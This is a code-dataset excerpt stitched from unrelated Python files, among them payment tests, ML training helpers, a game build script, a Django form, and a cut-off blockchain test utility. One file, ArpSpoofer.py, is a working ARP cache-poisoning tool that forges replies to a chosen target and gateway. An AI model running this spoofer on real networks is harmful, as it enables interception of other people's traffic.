filename
stringlengths 13
19
| text
stringlengths 134
1.04M
|
---|---|
the-stack_106_23755 | from decimal import Decimal
from unittest.mock import Mock, patch
import pytest
from ...checkout.calculations import checkout_total
from .. import ChargeStatus, GatewayError, PaymentError, TransactionKind, gateway
from ..error_codes import PaymentErrorCode
from ..interface import GatewayResponse, PaymentMethodInfo
from ..models import Payment
from ..utils import (
ALLOWED_GATEWAY_KINDS,
clean_authorize,
clean_capture,
create_payment,
create_payment_information,
create_transaction,
is_currency_supported,
validate_gateway_response,
)
NOT_ACTIVE_PAYMENT_ERROR = "This payment is no longer active."
EXAMPLE_ERROR = "Example dummy error"
@pytest.fixture
def payment_method_details():
return PaymentMethodInfo(
last_4="1234", exp_year=2020, exp_month=8, brand="visa", name="Joe Doe"
)
@pytest.fixture
def gateway_response(settings, payment_method_details):
return GatewayResponse(
is_success=True,
action_required=False,
transaction_id="transaction-token",
amount=Decimal(14.50),
currency="USD",
kind=TransactionKind.CAPTURE,
error=None,
raw_response={
"credit_card_four": "1234",
"transaction-id": "transaction-token",
},
payment_method_info=payment_method_details,
)
@pytest.fixture
def transaction_data(payment_dummy, gateway_response):
return {
"payment": payment_dummy,
"payment_information": create_payment_information(
payment_dummy, "payment-token"
),
"kind": TransactionKind.CAPTURE,
"gateway_response": gateway_response,
}
@pytest.fixture
def transaction_token():
return "transaction-token"
@pytest.fixture
def dummy_response(payment_dummy, transaction_token, payment_method_details):
return GatewayResponse(
is_success=True,
action_required=False,
transaction_id=transaction_token,
error=EXAMPLE_ERROR,
amount=payment_dummy.total,
currency=payment_dummy.currency,
kind=TransactionKind.AUTH,
raw_response=None,
payment_method_info=payment_method_details,
)
def test_create_payment(checkout_with_item, address):
checkout_with_item.billing_address = address
checkout_with_item.save()
data = {
"gateway": "Dummy",
"payment_token": "token",
"total": checkout_total(
checkout=checkout_with_item, lines=list(checkout_with_item)
).gross.amount,
"currency": checkout_with_item.currency,
"email": "[email protected]",
"customer_ip_address": "127.0.0.1",
"checkout": checkout_with_item,
}
payment = create_payment(**data)
assert payment.gateway == "Dummy"
same_payment = create_payment(**data)
assert payment == same_payment
def test_create_payment_requires_order_or_checkout(settings):
data = {
"gateway": "Dummy",
"payment_token": "token",
"total": 10,
"currency": "USD",
"email": "[email protected]",
}
with pytest.raises(TypeError) as e:
create_payment(**data)
assert e.value.args[0] == "Must provide checkout or order to create a payment."
def test_create_payment_from_checkout_requires_billing_address(checkout_with_item):
checkout_with_item.billing_address = None
checkout_with_item.save()
data = {
"gateway": "Dummy",
"payment_token": "token",
"total": checkout_total(
checkout=checkout_with_item, lines=list(checkout_with_item)
),
"currency": checkout_with_item.currency,
"email": "[email protected]",
"checkout": checkout_with_item,
}
with pytest.raises(PaymentError) as e:
create_payment(**data)
assert e.value.code == PaymentErrorCode.BILLING_ADDRESS_NOT_SET.value
def test_create_payment_from_order_requires_billing_address(draft_order):
draft_order.billing_address = None
draft_order.save()
data = {
"gateway": "Dummy",
"payment_token": "token",
"total": draft_order.total.gross.amount,
"currency": draft_order.currency,
"email": "[email protected]",
"order": draft_order,
}
with pytest.raises(PaymentError) as e:
create_payment(**data)
assert e.value.code == PaymentErrorCode.BILLING_ADDRESS_NOT_SET.value
def test_create_payment_information_for_checkout_payment(address, checkout_with_item):
checkout_with_item.billing_address = address
checkout_with_item.shipping_address = address
checkout_with_item.save()
data = {
"gateway": "Dummy",
"payment_token": "token",
"total": checkout_total(
checkout=checkout_with_item, lines=list(checkout_with_item)
).gross.amount,
"currency": checkout_with_item.currency,
"email": "[email protected]",
"customer_ip_address": "127.0.0.1",
"checkout": checkout_with_item,
}
payment = create_payment(**data)
payment_data = create_payment_information(payment, "token", payment.total)
billing = payment_data.billing
shipping = payment_data.shipping
assert billing
assert billing.first_name == address.first_name
assert billing.last_name == address.last_name
assert billing.street_address_1 == address.street_address_1
assert billing.city == address.city
assert shipping == billing
def test_create_payment_information_for_draft_order(draft_order):
data = {
"gateway": "Dummy",
"payment_token": "token",
"total": draft_order.total.gross.amount,
"currency": draft_order.currency,
"email": "[email protected]",
"customer_ip_address": "127.0.0.1",
"order": draft_order,
}
payment = create_payment(**data)
payment_data = create_payment_information(payment, "token", payment.total)
billing = payment_data.billing
shipping = payment_data.shipping
assert billing
assert billing.first_name == draft_order.billing_address.first_name
assert billing.last_name == draft_order.billing_address.last_name
assert billing.street_address_1 == draft_order.billing_address.street_address_1
assert billing.city == draft_order.billing_address.city
assert shipping == billing
def test_create_transaction(transaction_data):
txn = create_transaction(**transaction_data)
assert txn.payment == transaction_data["payment"]
gateway_response = transaction_data["gateway_response"]
assert txn.kind == gateway_response.kind
assert txn.amount == gateway_response.amount
assert txn.currency == gateway_response.currency
assert txn.token == gateway_response.transaction_id
assert txn.is_success == gateway_response.is_success
assert txn.gateway_response == gateway_response.raw_response
def test_create_transaction_no_gateway_response(transaction_data):
transaction_data.pop("gateway_response")
txn = create_transaction(**transaction_data)
assert txn.gateway_response == {}
@pytest.mark.parametrize(
"func",
[gateway.authorize, gateway.capture, gateway.confirm, gateway.refund, gateway.void],
)
def test_payment_needs_to_be_active_for_any_action(func, payment_dummy):
payment_dummy.is_active = False
with pytest.raises(PaymentError) as exc:
func(payment_dummy, "token")
assert exc.value.message == NOT_ACTIVE_PAYMENT_ERROR
@patch("saleor.order.actions.handle_fully_paid_order")
def test_gateway_charge_failed(
mock_handle_fully_paid_order, mock_get_manager, payment_txn_preauth, dummy_response
):
txn = payment_txn_preauth.transactions.first()
txn.is_success = False
payment = payment_txn_preauth
amount = payment.total
dummy_response.is_success = False
dummy_response.kind = TransactionKind.CAPTURE
mock_get_manager.capture_payment.return_value = dummy_response
with pytest.raises(PaymentError):
gateway.capture(payment, amount)
mock_get_manager.capture_payment.assert_called_once()
payment.refresh_from_db()
assert payment.charge_status == ChargeStatus.NOT_CHARGED
assert not payment.captured_amount
assert not mock_handle_fully_paid_order.called
def test_gateway_charge_errors(payment_dummy, transaction_token, settings):
payment = payment_dummy
gateway.authorize(payment, transaction_token)
with pytest.raises(PaymentError) as exc:
gateway.capture(payment, Decimal("0"))
assert exc.value.message == "Amount should be a positive number."
payment.charge_status = ChargeStatus.FULLY_REFUNDED
payment.save()
with pytest.raises(PaymentError) as exc:
gateway.capture(payment, Decimal("10"))
assert exc.value.message == "This payment cannot be captured."
payment.charge_status = ChargeStatus.NOT_CHARGED
payment.save()
with pytest.raises(PaymentError) as exc:
gateway.capture(payment, Decimal("1000000"))
assert exc.value.message == ("Unable to charge more than un-captured amount.")
def test_gateway_refund_errors(payment_txn_captured):
payment = payment_txn_captured
with pytest.raises(PaymentError) as exc:
gateway.refund(payment, Decimal("1000000"))
assert exc.value.message == "Cannot refund more than captured."
with pytest.raises(PaymentError) as exc:
gateway.refund(payment, Decimal("0"))
assert exc.value.message == "Amount should be a positive number."
payment.charge_status = ChargeStatus.NOT_CHARGED
payment.save()
with pytest.raises(PaymentError) as exc:
gateway.refund(payment, Decimal("1"))
assert exc.value.message == "This payment cannot be refunded."
def test_clean_authorize():
payment = Mock(can_authorize=Mock(return_value=True))
clean_authorize(payment)
payment = Mock(can_authorize=Mock(return_value=False))
with pytest.raises(PaymentError):
clean_authorize(payment)
def test_clean_capture():
# Amount should be a positive number
payment = Mock()
amount = Decimal("0.00")
with pytest.raises(PaymentError):
clean_capture(payment, amount)
# Payment cannot be captured
payment = Mock(can_capture=Mock(return_value=False))
amount = Decimal("1.00")
with pytest.raises(PaymentError):
clean_capture(payment, amount)
# Amount is larger than payment's total
payment = Mock(
can_capture=Mock(return_value=True),
total=Decimal("1.00"),
captured_amount=Decimal("0.00"),
)
amount = Decimal("2.00")
with pytest.raises(PaymentError):
clean_capture(payment, amount)
amount = Decimal("2.00")
payment = Mock(
can_capture=Mock(return_value=True),
total=amount,
captured_amount=Decimal("0.00"),
)
clean_capture(payment, amount)
def test_can_authorize(payment_dummy: Payment):
assert payment_dummy.charge_status == ChargeStatus.NOT_CHARGED
payment_dummy.is_active = False
assert not payment_dummy.can_authorize()
payment_dummy.is_active = True
assert payment_dummy.can_authorize()
payment_dummy.charge_status = ChargeStatus.PARTIALLY_CHARGED
assert not payment_dummy.can_authorize()
payment_dummy.charge_status = ChargeStatus.FULLY_CHARGED
assert not payment_dummy.can_authorize()
def test_can_capture(payment_txn_preauth: Payment):
assert payment_txn_preauth.charge_status == ChargeStatus.NOT_CHARGED
payment_txn_preauth.is_active = False
assert not payment_txn_preauth.can_capture()
payment_txn_preauth.is_active = True
assert payment_txn_preauth.can_capture()
payment_txn_preauth.charge_status = ChargeStatus.PARTIALLY_CHARGED
assert not payment_txn_preauth.can_capture()
payment_txn_preauth.charge_status = ChargeStatus.FULLY_CHARGED
assert not payment_txn_preauth.can_capture()
payment_txn_preauth.captured_amount = 0
payment_txn_preauth.transactions.all().delete()
assert not payment_txn_preauth.can_capture()
def test_can_void(payment_txn_preauth: Payment):
assert payment_txn_preauth.charge_status == ChargeStatus.NOT_CHARGED
payment_txn_preauth.is_active = False
assert not payment_txn_preauth.can_void()
payment_txn_preauth.is_active = True
assert payment_txn_preauth.can_void()
payment_txn_preauth.charge_status = ChargeStatus.PARTIALLY_CHARGED
assert not payment_txn_preauth.can_void()
payment_txn_preauth.charge_status = ChargeStatus.FULLY_CHARGED
assert not payment_txn_preauth.can_void()
payment_txn_preauth.charge_status = ChargeStatus.NOT_CHARGED
payment_txn_preauth.transactions.all().delete()
assert not payment_txn_preauth.can_void()
def test_can_refund(payment_dummy: Payment):
assert payment_dummy.charge_status == ChargeStatus.NOT_CHARGED
payment_dummy.is_active = False
assert not payment_dummy.can_refund()
payment_dummy.is_active = True
assert not payment_dummy.can_refund()
payment_dummy.charge_status = ChargeStatus.PARTIALLY_CHARGED
assert payment_dummy.can_refund()
payment_dummy.charge_status = ChargeStatus.FULLY_CHARGED
assert payment_dummy.can_refund()
def test_payment_get_authorized_amount(payment_txn_preauth):
payment = payment_txn_preauth
authorized_amount = payment.transactions.first().amount
assert payment.get_authorized_amount().amount == authorized_amount
assert payment.order.total_authorized.amount == authorized_amount
payment.transactions.create(
amount=payment.total,
kind=TransactionKind.CAPTURE,
gateway_response={},
is_success=True,
)
assert payment.get_authorized_amount().amount == Decimal(0)
payment.transactions.all().delete()
assert payment.get_authorized_amount().amount == Decimal(0)
def test_validate_gateway_response(gateway_response):
validate_gateway_response(gateway_response)
def test_validate_gateway_response_incorrect_transaction_kind(gateway_response):
gateway_response.kind = "incorrect-kind"
with pytest.raises(GatewayError) as e:
validate_gateway_response(gateway_response)
assert str(e.value) == (
"Gateway response kind must be one of {}".format(sorted(ALLOWED_GATEWAY_KINDS))
)
def test_validate_gateway_response_not_json_serializable(gateway_response):
class CustomClass(object):
pass
gateway_response.raw_response = CustomClass()
with pytest.raises(GatewayError) as e:
validate_gateway_response(gateway_response)
assert str(e.value) == "Gateway response needs to be json serializable"
@pytest.mark.parametrize(
"currency, exp_response", [("EUR", True), ("USD", True), ("PLN", False)],
)
def test_is_currency_supported(
currency, exp_response, dummy_gateway_config, monkeypatch
):
# given
dummy_gateway_config.supported_currencies = "USD, EUR"
monkeypatch.setattr(
"saleor.payment.gateways.dummy.plugin.DummyGatewayPlugin._get_gateway_config",
lambda _: dummy_gateway_config,
)
# when
response = is_currency_supported(currency, "mirumee.payments.dummy")
# then
assert response == exp_response
|
the-stack_106_23756 | from gensim.models import KeyedVectors
import numpy as np
import sys
import tqdm
import copy
import argparse
if __name__ == '__main__':
'''
'''
parser = argparse.ArgumentParser(description='Embedding similarity order generation')
parser.add_argument("--w2v_emb_path", type=str, default="")
parser.add_argument("--d2gpo_order_txt", type=str, default="")
parser.add_argument("--d2gpo_order_idx", type=str, default="")
args = parser.parse_args()
model = KeyedVectors.load_word2vec_format(args.w2v_emb_path)
if args.d2gpo_order_txt != "":
fout1 = open(args.d2gpo_order_txt, 'w', encoding='utf-8')
with open(args.d2gpo_order_idx, 'w', encoding='utf-8') as fout2:
for idx in tqdm.tqdm(range(len(model.vocab))):
word = model.index2word[idx]
most_similar = model.most_similar(word, topn=None)
most_similar_index = np.argsort(-most_similar)
most_similar_words = [model.index2word[widx] for widx in list(most_similar_index)]
most_similar_index = list(most_similar_index)
if args.d2gpo_order_txt != "":
fout1.write(' '.join(most_similar_words)+'\n')
fout2.write(' '.join([str(item) for item in most_similar_index])+'\n')
if args.d2gpo_order_txt != "":
fout1.close()
|
the-stack_106_23759 | from pathlib import Path
import pandas as pd
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.utils.data
import torchvision
import torchvision.models as models
from tqdm.notebook import tqdm
import math
def find_lr(
model,
train_loader,
optimizer="adam",
loss_fn="crossentropy",
device_type="CPU",
init_value=1e-8,
final_value=1e1,
):
# https://stackoverflow.com/questions/14313510/how-to-calculate-rolling-moving-average-using-numpy-scipy
def moving_average(x, w):
return np.convolve(x, np.ones(w), "valid") / w
batch_number = len(train_loader) - 1
update_step = (final_value / init_value) ** (1 / batch_number)
lr = init_value
# ----------------------
if (device_type == "GPU") & (torch.cuda.is_available()):
device = torch.device("cuda")
print(f"Training on GPU...\n")
elif device_type == "CPU":
device = torch.device("cpu")
print(f"Training on CPU...\n")
elif (device_type == "GPU") & (not torch.cuda.is_available()):
raise Exception("""GPU not found""")
else:
raise Exception("""Please choose between 'CPU' and 'GPU' for device type""")
model = model.to(device)
loss_fns = {
"crossentropy": torch.nn.CrossEntropyLoss,
"multimargin": torch.nn.MultiMarginLoss,
"softmargin": torch.nn.SoftMarginLoss,
"nnl": torch.nn.NLLLoss,
}
optimizers = {
"adamw": optim.AdamW,
"adam": optim.Adam,
"adagrad": optim.Adagrad,
"adadelta": optim.Adadelta,
"adamax": optim.Adamax,
"asgd": optim.ASGD,
"rmsprop": optim.RMSprop,
"sgd": optim.SGD,
"rprop": optim.Rprop,
}
# Instantiate loss function and optimizer
# TODO: error catching for not implemented
loss_fn, optimizer = (
loss_fns[loss_fn](),
optimizers[optimizer](model.parameters()),
)
# ----------------------
optimizer.param_groups[0]["lr"] = lr
best_loss = 0.0
batch_num = 0
losses = []
log_lrs = []
for data in tqdm(train_loader, desc="Training Batch"):
batch_num += 1
inputs, labels = data
inputs = inputs.to(device)
labels = labels.to(device)
optimizer.zero_grad()
outputs = model(inputs)
loss = loss_fn(outputs, labels)
if batch_num > 1 and loss > 4e1 * best_loss:
losses.append(loss)
log_lrs.append(lr)
if len(log_lrs) > 20:
return log_lrs[10:], losses[10:]
else:
return log_lrs, losses
# record the best loss
if loss < best_loss or batch_num == 1:
best_loss = loss
losses.append(loss)
# log_lrs.append(math.log10(lr))
log_lrs.append(lr)
loss.backward()
optimizer.step()
lr *= update_step
optimizer.param_groups[0]["lr"] = lr
losses = moving_average(losses, 5)
if len(log_lrs) > 20:
return log_lrs[10:], losses[10:]
else:
return log_lrs, losses
def train(
model: nn.Module,
train_loader,
val_loader,
optimizer="adam",
loss_fn="crossentropy",
epochs: int = 20,
learning_rate=3e-4,
device_type: str = "cpu",
) -> pd.DataFrame:
"""
Train pytorch model
:param model: Pytorch model
:returns: Metrics dataframe
"""
if (device_type == "GPU") & (torch.cuda.is_available()):
device = torch.device("cuda")
torch.cuda.empty_cache() # clear data
print(f"Training on GPU...\n")
elif device_type == "CPU":
device = torch.device("cpu")
print(f"Training on CPU...\n")
elif (device_type == "GPU") & (not torch.cuda.is_available()):
raise Exception("""GPU not found""")
else:
raise Exception("""Please choose between 'CPU' and 'GPU' for device type""")
model = model.to(device)
loss_fns = {
"crossentropy": torch.nn.CrossEntropyLoss,
"multimargin": torch.nn.MultiMarginLoss,
"softmargin": torch.nn.SoftMarginLoss,
"nnl": torch.nn.NLLLoss,
}
optimizers = {
"adamw": optim.AdamW,
"adam": optim.Adam,
"adagrad": optim.Adagrad,
"adadelta": optim.Adadelta,
"adamax": optim.Adamax,
"asgd": optim.ASGD,
"rmsprop": optim.RMSprop,
"sgd": optim.SGD,
"rprop": optim.Rprop,
}
# Instantiate loss function and optimizer
# TODO: error catching for not implemented
loss_fn, optimizer = (
loss_fns[loss_fn](),
optimizers[optimizer](model.parameters(), lr=learning_rate),
)
metrics_dict = {
"Epoch": [],
"Training Loss": [],
"Validation Loss": [],
"Training Accuracy": [],
"Validation Accuracy": [],
}
for epoch in tqdm(range(1, epochs + 1), desc="Epoch"):
#### TRAINING LOOP ####
training_loss = 0.0
model.train()
num_correct = 0
num_training_examples = 0
for batch in tqdm(
train_loader, desc="Training Batch", leave=bool(epoch == epochs)
): #
optimizer.zero_grad() # zeroize gradients
inputs, targets = batch
inputs = inputs.to(device)
targets = targets.to(device)
output = model(inputs) # forward pass
loss = loss_fn(output, targets) # calculate loss
loss.backward() # calculate gradients
optimizer.step() # adjust/step weights + biases
training_loss += loss.data.item() * inputs.size()[0]
correct = torch.eq(
torch.max(output.softmax(dim=1), dim=-1)[1], targets.squeeze()
).sum()
num_correct += correct.data.item()
num_training_examples += inputs.shape[0]
training_accuracy = num_correct / num_training_examples
training_loss /= len(
train_loader.dataset
) # weighted average training loss for epoch
#### TRAINING LOOP ####
#### VALIDATION/EVALUATION LOOP ####
valid_loss = 0.0
num_correct = 0
num_validation_examples = 0
model.eval()
for batch in tqdm(
val_loader, desc="Validation Batch", leave=bool(epoch == epochs)
):
inputs, targets = batch
inputs = inputs.to(device)
targets = targets.to(device)
output = model(inputs)
loss = loss_fn(output, targets) # calculate loss
valid_loss += loss.data.item() * inputs.size()[0]
correct = torch.eq(
torch.max(output.softmax(dim=1), dim=-1)[1], targets.squeeze()
).sum()
num_correct += correct.data.item()
num_validation_examples += inputs.shape[0]
valid_loss /= len(val_loader.dataset)
validation_accuracy = num_correct / num_validation_examples
#### VALIDATION/EVALUATION LOOP ####
#### PRINT PERFORMANCE METRICS #####
metrics_dict["Epoch"].append(epoch)
metrics_dict["Training Loss"].append(training_loss)
metrics_dict["Validation Loss"].append(valid_loss)
metrics_dict["Training Accuracy"].append(training_accuracy)
metrics_dict["Validation Accuracy"].append(validation_accuracy)
#### PRINT PERFORMANCE METRICS #####
metrics_dict = pd.DataFrame(metrics_dict)
return model, metrics_dict
|
the-stack_106_23760 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
# Package the game for distribution - make sure to configure project.json
# Usage : Build.py <absolute-output-dir>
#
# Gwennaël Arbona 2021
#-------------------------------------------------------------------------------
import re
import os
import sys
import json
import shutil
import subprocess
#-------------------------------------------------------------------------------
# Read config files for data
#-------------------------------------------------------------------------------
projectConfigFile = open('../Config/Build.json')
projectConfig = json.load(projectConfigFile)
# Get mandatory project settings
projectName = str(projectConfig['name'])
projectPlatforms = projectConfig['platforms']
projectBuildConfiguration = projectConfig['configuration']
projectKeepPdbs = projectConfig['pdb']
# Get optional build settings
outputDir = os.path.abspath(str(projectConfig.get('outputDir')))
engineDir = str(projectConfig.get('engineDir'))
sourceEngine = projectConfig.get('sourceEngine')
projectConfigFile.close()
# Get version tag
gitCommand = ['git', 'describe', '--tags']
try:
buildVersion = subprocess.check_output(gitCommand).decode('utf-8')
buildVersion = buildVersion.replace('\n', '');
except:
sys.exit('Git describe failed')
#-------------------------------------------------------------------------------
# Process arguments for sanity
#-------------------------------------------------------------------------------
# Get output directory
if outputDir == 'None':
if len(sys.argv) == 2:
outputDir = sys.argv[1]
else:
sys.exit('Output directory was neither set in project.json nor passed as command line')
# Get engine directory
if engineDir != 'None':
if not os.path.exists(engineDir):
sys.exit('Engine directory provided in project.json does not exist')
if 'UE_ROOT' in os.environ:
engineDir = os.environ['UE_ROOT']
if not os.path.exists(engineDir):
sys.exit('Engine directory provided in %UE_ROOT% does not exist')
else:
sys.exit('Engine directory was set neither in project.json nor UE_ROOT environment variable')
# Installed vs built engine
if sourceEngine:
installedOption = ''
cleanOption = ''
else:
installedOption = '-installed'
cleanOption = ''
# Generate paths
projectFile = os.path.join(os.getcwd(), '..', projectName + '.uproject')
engineBuildTool = os.path.join(engineDir, 'Engine', 'Build', 'BatchFiles', 'RunUAT.bat')
# Clean up output path
releaseOutputDir = os.path.join(os.getcwd(), '..', 'Releases', buildVersion)
if os.path.exists(releaseOutputDir):
shutil.rmtree(releaseOutputDir)
#-------------------------------------------------------------------------------
# Build project
#-------------------------------------------------------------------------------
# Execute build command for each platform
for platform in projectPlatforms:
cleanPlatformNames = {
'Win64' : 'Windows',
'Linux' : 'Linux'
}
# Clean up output path
buildOutputDir = os.path.join(outputDir, cleanPlatformNames[platform])
if os.path.exists(buildOutputDir):
shutil.rmtree(buildOutputDir)
# Build project
subprocess.check_call([
engineBuildTool,
# SDK
'-ScriptsForProject="' + projectFile + '"',
'Turnkey',
'-command=VerifySdk',
'-platform=' + platform,
'-UpdateIfNeeded',
# Executable
'BuildCookRun',
'-unrealexe=UnrealEditor-Cmd.exe',
# Project
'-project="' + projectFile + '"',
'-utf8output', '-nop4',
# Build
'-nocompile',
'-clientconfig=' + projectBuildConfiguration,
'-build',
'-targetplatform=' + platform,
cleanOption,
installedOption,
# Cook
'-cook',
'-skipcookingeditorcontent',
'-createreleaseversion=' + buildVersion,
# Package
'-stage',
'-package',
'-pak',
'-compressed',
'-distribution',
'-archive',
'-archivedirectory="' + outputDir + '"'
])
# Remove individual files that are not wanted in release
for root, directories, filenames in os.walk(buildOutputDir):
for filename in filenames:
absoluteFilename = str(os.path.join(root, filename))
baseChunkName = projectName + '-' + cleanPlatformNames[platform] + '-'
# Wipe generated files that aren't needed
if re.match('.*\.((pdb)|(debug))', filename):
if 'ThirdParty' in root or not projectKeepPdbs:
shutil.move(absoluteFilename, releaseOutputDir)
elif re.match('Manifest.*\.txt', filename):
os.remove(absoluteFilename)
# Rename optional chunks
chunkMatch = re.search('pakchunk([0-9]+)optional.*\.pak', filename)
if chunkMatch:
absoluteChunkFilename = str(os.path.join(root, baseChunkName + chunkMatch.group(1) + 'b.pak'))
shutil.move(absoluteFilename, absoluteChunkFilename)
# Rename normal chunks
else:
chunkMatch = re.search('pakchunk([0-9]+).*\.pak', filename)
if chunkMatch:
absoluteChunkFilename = str(os.path.join(root, baseChunkName + chunkMatch.group(1) + '.pak'))
shutil.move(absoluteFilename, absoluteChunkFilename)
# Remove unwanted config directories, engine debug content, unused libraries
shutil.rmtree(os.path.join(buildOutputDir, projectName, 'Config'), ignore_errors=True)
shutil.rmtree(os.path.join(buildOutputDir, 'Engine', 'Content'), ignore_errors=True)
shutil.rmtree(os.path.join(buildOutputDir, 'Engine', 'Binaries', 'ThirdParty', 'NVIDIA'), ignore_errors=True)
shutil.rmtree(os.path.join(buildOutputDir, 'Engine', 'Binaries', 'ThirdParty', 'PhysX3'), ignore_errors=True)
# Copy Steam appId file
buildExecutableDir = os.path.join(buildOutputDir, projectName, 'Binaries', platform)
shutil.copyfile(os.path.join('..', 'steam_appid.txt'), os.path.join(buildExecutableDir, 'steam_appid.txt'))
# Copy the crash reporter
crashReportExecutableDir = os.path.join(buildOutputDir, 'Engine', 'Binaries', platform)
crashReportExecutable = os.path.join('..', 'Mayday')
os.mkdir(crashReportExecutableDir)
if platform == 'Linux':
if os.path.exists(crashReportExecutable):
shutil.copyfile(crashReportExecutable, os.path.join(crashReportExecutableDir, 'CrashReportClient'))
else:
crashReportExecutable = crashReportExecutable + '.exe'
if os.path.exists(crashReportExecutable):
shutil.copyfile(crashReportExecutable, os.path.join(crashReportExecutableDir, 'CrashReportClient.exe'))
|
the-stack_106_23761 | '''
ArpSpoofer.py by Amitai Farber 1/2021
This script prforming an arp spoofing on the local newtwork.
It doing so by constantly sending 'is at' responses to the attacked
computer with our mac and the desired IP, so that the attacked computer thinks
that we are the ip we sent him.
'''
from time import sleep
import argparse
import netifaces
from scapy.all import *
from getmac import get_mac_address as gma
import sys
import defaults
def main(args):
iface = args.iface
src = args.src
delay = args.delay
gw = args.gw
target = args.target
got_src = True
if not iface:
iface = defaults.iface
if not src:
got_src = False
src = get_gw_ip(iface)
if not delay:
delay = defauts.delay
if not gw:
gw = defaults.gw
gw_ip = get_gw_ip(iface)
target_mac = get_mac_by_ip(target)
gw_mac = get_mac_by_ip(gw_ip)
my_mac = gma()
while True:
send_ARP_response(iface, src, target, gw, gw_ip, target_mac, my_mac, gw_mac, got_src)
sleep(delay)
def send_ARP_response(iface, src, target, gw, gw_ip, dst_mac, my_mac, gw_mac, got_src):
send_is_at(iface, target, dst_mac, my_mac, src)
if gw:
if got_src:
send_is_at(iface, gw_ip, gw_mac, my_mac, src)
else:
send_is_at(iface, gw_ip, gw_mac, my_mac, target)
def get_gw_ip(iface):
gateways = netifaces.gateways()
return gateways['default'][netifaces.AF_INET][0]
def send_is_at(iface, target, dst_mac, my_mac, ip):
msg = f'sending \'is_at\' to {target} (mac: {dst_mac})'
msg += f'that will convince him that the mac of {ip} is our mac ({my_mac})'
print(msg)
packet = Ether(dst=dst_mac, src=my_mac) / ARP(op=2, hwsrc=my_mac, psrc=ip, hwdst=dst_mac, pdst=target)
sendp(packet, iface=iface)
def get_mac_by_ip(dst_ip):
my_ip = get_if_addr(conf.iface)
response = sr(ARP(op=1, psrc=my_ip, pdst=dst_ip), timeout=5)
return response[0][ARP][0][1].hwsrc
if __name__ == "__main__":
filename = sys.argv[0].split('\\')[-1].split('/')[-1]
example_text = f'''Example:
for making 10.0.0.12 think we are the gateway:
python {filename} -t 10.0.0.12
for making 10.0.0.12 think we are the gateway, and the the gateway think we are 10.0.0.12:
python {filename} -t 10.0.0.12 -gw
'''
parser = argparse.ArgumentParser(description='Spoof ARP tables',
epilog=example_text,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-i', '--iface', type=str, help='Interface you wish to use')
parser.add_argument('-s', '--src', type=str, help='The address you want for the attacker')
parser.add_argument('-d', '--delay', type=int, help='Delay (in seconds) between messages')
parser.add_argument('-gw', help='should GW be attacked as well?', action='store_true')
parser.add_argument('-t', '--target', type=str, help='IP of target', required=True)
args = parser.parse_args()
main(args)
|
the-stack_106_23763 | # encoding: utf-8
from __future__ import unicode_literals
from django import forms
from django.utils.translation import ugettext_lazy as _
from userena.forms import SignupForm
class SignupFormExtra(SignupForm):
"""
A form to demonstrate how to add extra fields to the signup form, in this
case adding the first and last name.
"""
first_name = forms.CharField(label=_('First name'),
max_length=30,
required=False)
last_name = forms.CharField(label=_('Last name'),
max_length=30,
required=False)
def __init__(self, *args, **kw):
"""
A bit of hackery to get the first name and last name at the top of the
form instead at the end.
"""
super(SignupFormExtra, self).__init__(*args, **kw)
# Put the first and last name at the top
new_order = self.fields.keyOrder[:-2]
new_order.insert(0, 'first_name')
new_order.insert(1, 'last_name')
self.fields.keyOrder = new_order
def save(self):
"""
Override the save method to save the first and last name to the user
field.
"""
# First save the parent form and get the user.
new_user = super(SignupFormExtra, self).save()
new_user.first_name = self.cleaned_data['first_name']
new_user.last_name = self.cleaned_data['last_name']
new_user.save()
# Userena expects to get the new user from this form, so return the new
# user.
return new_user |
the-stack_106_23767 | #!/usr/bin/env python3
# Copyright (c) 2015-2018 The Stancecoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Utilities for manipulating blocks and transactions."""
from .address import (
key_to_p2sh_p2wpkh,
key_to_p2wpkh,
script_to_p2sh_p2wsh,
script_to_p2wsh,
)
from .messages import (
CBlock,
COIN,
COutPoint,
CTransaction,
CTxIn,
CTxInWitness,
CTxOut,
FromHex,
ToHex,
bytes_to_hex_str,
hash256,
hex_str_to_bytes,
ser_string,
ser_uint256,
sha256,
uint256_from_str,
)
from .script import (
CScript,
OP_0,
OP_1,
OP_CHECKMULTISIG,
OP_CHECKSIG,
OP_RETURN,
OP_TRUE,
hash160,
)
from .util import assert_equal
from io import BytesIO
# From BIP141
WITNESS_COMMITMENT_HEADER = b"\xaa\x21\xa9\xed"
def create_block(hashprev, coinbase, ntime=None):
"""Create a block (with regtest difficulty)."""
block = CBlock()
if ntime is None:
import time
block.nTime = int(time.time() + 600)
else:
block.nTime = ntime
block.hashPrevBlock = hashprev
block.nBits = 0x207fffff # difficulty retargeting is disabled in REGTEST chainparams
block.vtx.append(coinbase)
block.hashMerkleRoot = block.calc_merkle_root()
block.calc_sha256()
return block
def get_witness_script(witness_root, witness_nonce):
witness_commitment = uint256_from_str(hash256(ser_uint256(witness_root) + ser_uint256(witness_nonce)))
output_data = WITNESS_COMMITMENT_HEADER + ser_uint256(witness_commitment)
return CScript([OP_RETURN, output_data])
def add_witness_commitment(block, nonce=0):
"""Add a witness commitment to the block's coinbase transaction.
According to BIP141, blocks with witness rules active must commit to the
hash of all in-block transactions including witness."""
# First calculate the merkle root of the block's
# transactions, with witnesses.
witness_nonce = nonce
witness_root = block.calc_witness_merkle_root()
# witness_nonce should go to coinbase witness.
block.vtx[0].wit.vtxinwit = [CTxInWitness()]
block.vtx[0].wit.vtxinwit[0].scriptWitness.stack = [ser_uint256(witness_nonce)]
# witness commitment is the last OP_RETURN output in coinbase
block.vtx[0].vout.append(CTxOut(0, get_witness_script(witness_root, witness_nonce)))
block.vtx[0].rehash()
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
def serialize_script_num(value):
r = bytearray(0)
if value == 0:
return r
neg = value < 0
absvalue = -value if neg else value
while (absvalue):
r.append(int(absvalue & 0xff))
absvalue >>= 8
if r[-1] & 0x80:
r.append(0x80 if neg else 0)
elif neg:
r[-1] |= 0x80
return r
def create_coinbase(height, pubkey=None):
"""Create a coinbase transaction, assuming no miner fees.
If pubkey is passed in, the coinbase output will be a P2PK output;
otherwise an anyone-can-spend output."""
coinbase = CTransaction()
coinbase.vin.append(CTxIn(COutPoint(0, 0xffffffff),
ser_string(serialize_script_num(height)), 0xffffffff))
coinbaseoutput = CTxOut()
